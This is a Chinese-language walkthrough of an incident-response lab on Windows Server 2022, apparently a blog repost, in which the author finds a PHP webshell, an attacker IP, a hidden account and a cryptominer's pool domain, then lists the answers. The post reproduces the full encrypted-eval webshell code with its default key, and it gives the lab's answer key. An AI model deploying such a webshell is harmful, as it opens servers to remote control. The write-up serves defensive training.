Windows Server 2022 Web1

news/2024/11/25 8:10:37/

载入靶机,看到相关描述:


进入虚拟机发现桌面有phpstudy和解题两个软件:


打开解题.exe,发现里面是一些问题,接下来就需要获取相关信息:

1、shell密码

2、IP地址

3、隐藏账户名称

4、挖矿程序的矿池域名


打开phpstudy查看一下相关线索:


找到web目录


复制“蓝队应急响应工具箱”粘贴到winserver 2022中:


使用”D盾“:

发现后门


<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>

注释直接指明密码是rebeyond,第一问解决


再回到phpstudy中,找到Apache的日志文件

成功得到攻击者的IP地址:192.168.126.1,第二问解决


而且发现大量POST请求信息,明显的爆破行为,推测存在弱口令:


使用”Windows日志一键分析“:

可看到未知用户名:hack168,第三问解决

(当然也能可以看到攻击者IP地址)


找到hack168$目录寻找别的线索:

找到个”Kuang.exe“文件,看字母应该就是挖矿程序,运行一下,发现CPU占用率飙升

我勒个CPU使用率100%

可以确定挖矿程序就是”Kuang.exe“


看图标可以看出是个pyinstaller打包

根据之前写过的文章的《[SWPUCTF 2022 新生赛]py1》内容,进行反编译,将Kuang.exe复制粘贴到bucket目录:


运行main.py文件:


得到两个新文件:

按理说应该得到一个文件夹(通常名字叫XXX.exe_extracted)才对,但还是继续做下去看看情况吧


Kuang.py文件打开内容如下:


Kuang.pyc文件内容如下,虽然有乱码,但可以发现关键内容有域名信息:

得到矿池域名:wakuang.zhigongshanfang.top(注意:得去掉http://头),第四问解决,这里有乱码,不太好反编译,但还是尝试一下能不能成功


(注意:本来我是先放到在线反编译pyc网站中运行,发现没法运行的时候就改用010editor改文件头了)

用010editor打开pyc文件,添加文件头33 0D 0D 0A 00 00 00 00 00 00 00 00:


保存之后复制粘贴到pycdc.exe的同级目录下:


pycdc.exe Kuang.pyc > Kuang.py

果然失败了,要么是文件头改错了,要么是生成的pyc文件有点问题


或者使用另一种工具得到pyc文件

https://github.com/extremecoders-re/pyinstxtractor/tree/2024.04/pyinstxtractor


将Kuang.exe文件复制粘贴到同级目录下再运行pyinstxtractor.py文件:


多了个文件夹:

得到pyc文件


放到在线反编译pyc网站中运行一下:

也是成功看到矿池域名是:wakuang.zhigongshanfang.top


当然,也可以放到pycdc.exe的同级目录下:


pycdc.exe Kuang.pyc > Kuang.py


生成了Kuang.py文件:


打开之后也是一样的代码:

一样可以得到矿池域名:wakuang.zhigongshanfang.top


双击”解题.exe“,填入所有的答案:

rebeyond

192.168.126.1

hack168

wakuang.zhigongshanfang.top

(这里不知道为什么填了最后一个问题就会退出”解题.exe“的cmd终端界面,就用了张别人的图来展示一下)


http://www.ppmy.cn/news/1548952.html

相关文章

学了Arcgis的水文分析——捕捉倾泻点,河流提取与河网分级,3D图层转要素失败的解决方法,测量学综合实习网站存着

ArcGIS水文分析实战教程&#xff08;7&#xff09;细说流域提取_汇流域栅格-CSDN博客 ArcGIS水文分析实战教程&#xff08;6&#xff09;河流提取与河网分级_arcgis的dem河流分级-CSDN博客 ArcGIS水文分析实战教程&#xff08;5&#xff09;细说流向与流量-CSDN博客 ArcGIS …

2024年11月17日Github流行趋势

项目名称&#xff1a;codecrafters-io / build-your-own-x 项目维护者&#xff1a;danistefanovic, rohitpaulk, sarupbanskota, fake-rookie, bauripalash等项目介绍&#xff1a;通过从头开始重新创建你最喜欢的技术来掌握编程。项目star数&#xff1a;310,978项目fork数&…

mysql中between and怎么用

在 MySQL 中&#xff0c;BETWEEN ... AND ... 是一个非常有用的运算符&#xff0c;用于选择介于两个值之间的数据范围。这个运算符可以用于数字、日期和字符串等数据类型。下面是一些具体的用法示例。 ### 基本语法 sql SELECT column_name FROM table_name WHERE column_nam…

【CVPR2024】2024年CVPR的3D 目标检测的综述(还在补充中)

透视单目DETR 2D 透视单目DETR 2D的。对于DETR系列消除了 NMS的2D目标检测,RT-DETR[8]设计了一个高效的混合编码器,通过解耦尺度内交互和跨尺度融合来提高速度。采用不确定性最小查询选择,为解码器提供高质量的初始查询,从而提高准确率。 透视单目3D 透视单目3D。MonoCD…

tensorRT(win系统)环境安装与测试

下载地址&#xff1a;https://developer.nvidia.com/tensorrt 文档地址&#xff1a;https://docs.nvidia.com/deeplearning/tensorrt/support-matrix/index.html 先决条件&#xff1a;英伟达显卡、win操作系统、安装了cuda、安装cudnn、安装vs2020、 注意&#xff1a;看官方文…

【云原生】Docker搭建开源翻译组件Deepl使用详解

目录 一、前言 二、微服务项目使用翻译组件的场景 2.1 多语言用户界面 2.2 业务逻辑中的翻译需求 2.3 满足实时通信的要求 2.4 内容管理系统 2.5 个性化推荐系统 2.6 日志和监控 三、开源类翻译组件解决方案 3.1 国内翻译组件方案汇总 3.1.1 百度翻译 3.1.2 腾讯翻…

vue3 路由守卫

在Vue 3中&#xff0c;路由守卫是一种控制和管理路由跳转的机制。它允许你在执行导航前后进行一些逻辑处理&#xff0c;比如权限验证、数据预取等&#xff0c;从而增强应用的安全性和效率。路由守卫分为几种不同的类型&#xff0c;每种类型的守卫都有其特定的应用场景。 其实路…

以Java为例,实现一个简单的命令行图书管理系统,包括添加图书、删除图书、查找图书等功能。

江河湖海中的代码之旅&#xff1a;打造你的命令行图书管理系统 一、系统简介 1. Java简介 Java&#xff0c;这个编程语言界的“瑞士军刀”&#xff0c;自1995年诞生以来就以其跨平台的特性和强大的生态系统征服了无数开发者的心。想象一下&#xff0c;Java就像是一条蜿蜒曲折…